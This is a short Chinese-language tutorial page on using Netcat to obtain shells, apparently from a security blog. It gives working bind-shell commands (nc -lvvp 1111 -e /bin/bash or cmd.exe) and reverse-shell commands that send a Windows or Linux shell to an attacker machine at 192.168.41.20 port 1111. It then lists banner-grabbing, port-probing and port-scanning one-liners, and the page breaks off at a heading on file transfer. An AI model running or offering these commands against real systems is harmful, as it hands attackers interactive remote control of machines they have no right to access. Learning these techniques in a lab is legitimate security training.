Netcat反弹shell
一:正向代理
Netcat简称NC,是一个简单、可靠的网络工具,被誉为网络界的瑞士军&刀
windows机器 nc64.exe -lvvp 1111 -e C:WindowsSystem32cmd.exe
linux机器 nc -lvvp 1111 -e /bin/bash
攻击机机
nc64.exe 192.168.41.130 1111
得到正向代理shell
二:反向代理
攻击者机器 192.168.41.20 不能直接访问服务器,但是服务器 192.168.41.130 可以访问攻击者的机器,这个时候可以使用反向shell
在攻击者机器运行
#监听1111端口 nc64.exe -lvvp 1111
在服务器上运行(反弹到攻击机上)
windos机器 nc64.exe -e C:WindowsSystem32cmd.exe 192.168.41.20 1111
linux机器 nc -e /bin/bash 192.168.41.20 1111
三:Netcat的其他用法
Banner 的抓取
靶机运行着ssh服务,可以查看服务的版本
nc64.exe -nv IP Port
端口探测
可以查看端口的开放情况,可以看到我们目标服务器的80端口没有开放
nc64.exe -v IP Port
多端口扫描
可以查看多端口是否开放和允许的服务
nc -v -z IP Port[1]-Port[65535]
端口监听
监听端口,当访问该端口会输出该信息
nc64.exe -l -p Port
文件传输
© 版权声明
特别提醒: 内容为用户自行发布,如有侵权,请联系我们管理员删除,邮箱:mail@xieniao.com ,在收到您的邮件后我们会在3个工作日内处理。
相关文章
暂无评论...